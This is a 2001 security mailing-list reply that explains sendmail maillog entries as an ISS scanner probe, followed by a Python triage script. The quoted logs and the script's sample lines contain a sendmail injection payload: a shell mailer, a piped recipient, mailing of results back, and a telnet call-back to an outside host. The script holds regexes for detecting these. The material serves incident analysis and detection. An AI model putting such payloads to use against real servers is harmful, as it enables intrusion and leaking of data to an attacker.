Hi Eddie,

This is probably a scan from someone using ISS Internet Scanner against your server. Given that it's a fairly expensive program I doubt it's a script kiddy (unless there are warez of it floating around somewhere), but the source of the scans is fairly obvious in your logs. Basically it's scanning your server for sendmail vulnerabilities, and emailing any it finds back to [EMAIL PROTECTED]. Given that it's Internet Scanner, I recommend you check your other logs as well since it scans for a whole mess of stuff.

Note that it's also attempting to telnet back to this guy's box (the 'telnet 203.87.15.193 5701' part), though for what intention I'm not sure. That IP resolves to: ara-as1-p193.netconnect.net.au. Could be dialup, could be DSL, I dunno.

Unless you want traffic from this network for some reason, you may as well just block all inbound and outbound connections to this guy's system/network (netconnect.net.au) to prevent any more scans or sending of information to him. You may also want to report the scans to his ISP, since his email address is in plain view.

Take care,
Ralph Forsythe
[EMAIL PROTECTED]

At 12:03 PM 12/23/2001 -0800, Eddie Bishop wrote:
>From: "Edward Bishop" <[EMAIL PROTECTED]>
>Date: Sat, 22 Dec 2001 23:25:51 -0000
>Subject: [cobalt-security] Maybe OT: maillog reports attack; other lists?
>
>I've got four entries in my maillog which I've never seen before and which
>look terrifying. This is on my non-Cobalt server (RedHat) so I don't know if
>it's of relevance to this list. If not, apologies - but I'd be grateful for
>suggestions as to good lists to try, hopefully with people as helpful as on
>this one.
>
>Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from
>ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog,
>P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c
>$u^M R<"|/... Vulnerable | mail [EMAIL PROTECTED]">^M R<"|( sleep 2 ;
>echo quit ) |telnet 203.87.15.193 5701"
>
>Dec 22 15:16:56 ns sendmail[9836]: NOQUEUE: POSSIBLE ATTACK from
>ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog,
>P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c
>$u^M R<"|/... Vulnerable | mail [EMAIL PROTECTED]">^M R<"|( sleep 2 ;
>echo quit ) |telnet 203.87.15.193 5701"
>
>Dec 22 15:16:57 ns sendmail[9837]: NOQUEUE:
>issCrootMprogP/bin/shFlsDFMeuAsh-c$uMlocalP/bin/shFlsDFMeuAsh-c$uR|/bin/echo
>SendmailIdentdBugVulnera: VRFY 1145130318@ISS
>
>Dec 22 15:16:57 ns sendmail[9838]: NOQUEUE:
>issCrootMprogP/bin/shFlsDFMeuAsh-c$uMlocalP/bin/shFlsDFMeuAsh-c$uR|/bin/echo
>SendmailIdentdBugVulnera: VRFY 1145130318@ISS
>
>--
>Eddie Bishop

_______________________________________________
cobalt-security mailing list
[EMAIL PROTECTED]
http://list.cobalt.com/mailman/listinfo/cobalt-security
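
An added example, not part of the original messages: a small maillog triage script for the kind of entries quoted in this thread, grouping them by the source host sendmail logged and pulling out any telnet call-back address so it can be checked against firewall and other logs. The sample lines, `host193.example.net` and the documentation-range addresses are constructed placeholders, and the function and flag names are this example's own.

```python
import re
from collections import defaultdict

# Constructed sample lines modelled on the maillog entries quoted in this thread;
# the host name and addresses are documentation placeholders, not real systems.
SAMPLE_LOG = [
    'Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from '
    'host193.example.net: newline in string "iss^M Croot^M Mprog, P=/bin/sh, '
    'F=lsDFMeu, A=sh -c $u^M R<"|( sleep 2 ; echo quit ) |telnet 203.0.113.193 5701"',
    'Dec 22 15:16:57 ns sendmail[9837]: NOQUEUE: issCrootMprogP/bin/shFlsDFMeu'
    'Ash-c$uR|/bin/echo: VRFY 1145130318@ISS',
    'Dec 22 15:20:01 ns sendmail[9901]: fBMNK1x09901: from=<user@example.org>, '
    'size=1204, nrcpts=1, relay=mail.example.org [192.0.2.10]',
]

ATTACK = re.compile(r'POSSIBLE ATTACK from (\S+?): (.*)$')
SHELL_MAILER = re.compile(r'P=?/bin/sh')      # mailer definition pointing at a shell
PIPE_RCPT = re.compile(r'R<"\|')              # recipient that pipes to a program
CALLBACK = re.compile(r'telnet\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)')


def triage(lines):
    """Group suspicious sendmail NOQUEUE entries by the source host sendmail logged."""
    report = defaultdict(lambda: {"hits": 0, "flags": set(), "callbacks": set()})
    for line in lines:
        if "sendmail[" not in line or "NOQUEUE:" not in line:
            continue
        attack = ATTACK.search(line)
        if attack:
            src, detail = attack.groups()
        elif SHELL_MAILER.search(line):
            # Entries like the VRFY ones in the thread carry no source host.
            src, detail = "unknown", line
        else:
            continue
        entry = report[src]
        entry["hits"] += 1
        if SHELL_MAILER.search(detail):
            entry["flags"].add("shell-mailer")
        if PIPE_RCPT.search(detail):
            entry["flags"].add("pipe-recipient")
        for host, port in CALLBACK.findall(detail):
            entry["flags"].add("outbound-callback")
            entry["callbacks"].add((host, int(port)))
    return dict(report)


if __name__ == "__main__":
    for src, info in triage(SAMPLE_LOG).items():
        print(src, info["hits"], sorted(info["flags"]), sorted(info["callbacks"]))
```

Any address it reports under `callbacks` is a candidate for the inbound and outbound block suggested in the reply, and for a search of the other service logs on the same host.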
